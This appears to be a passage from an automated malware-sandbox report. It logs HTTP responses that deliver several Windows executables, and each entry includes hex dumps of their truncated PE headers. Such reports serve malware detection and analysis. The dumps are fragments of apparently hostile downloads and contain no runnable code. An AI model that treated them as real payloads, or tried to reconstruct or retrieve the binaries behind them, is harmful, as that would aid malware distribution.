00 00 00 00 2e 74 65 78 74 00 00 00 05 ff 00 00 00 10 00 00 00 00 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 32 6c 00 00 00 10 01 00 00 6e 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 cd c2 03 00 80 01 00 00 f4 03 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 0d 6d 01 00 00 50 c4 03 00 6e 01 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 13 00 00 00 c0 c5 03 00 14 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 15:11:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 15:00:01 GMTETag: "4a800-6170128792a26"Accept-Ranges: bytesContent-Length: 305152Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 3c 9d 55 32 5d f3 06 32 5d f3 06 32 5d f3 06 3f 0f 2c 06 2e 5d f3 06 3f 0f 13 06 4c 5d f3 06 3f 0f 12 06 1c 5d f3 06 3b 25 60 06 31 5d f3 06 32 5d f2 06 5e 5d f3 06 87 c3 16 06 33 5d f3 06 3f 0f 28 06 33 5d f3 06 87 c3 2d 06 33 5d f3 06 52 69 63 68 32 5d f3 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 df 3d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 00 01 00 00 80 c2 03 00 00 00 00 47 43 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 c3 03 00 04 00 00 50 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 01 00 28 00 00 00 00 20 c2 03 70 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 c3 03 64 13 00 00 f0 11 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 68 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 ff 00 00 00 10 00 00 00 00 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 32 6c 00 00 00 10 01 00 00 6e 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 90 c0 03 00 80 01 00 00 b6 01 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 6a 01 00 00 20 c2 03 00 6c 01 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 13 00 00 00 90 c3 03 00 14 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:13 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 15:11:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:22 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:25 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:27 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:31 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 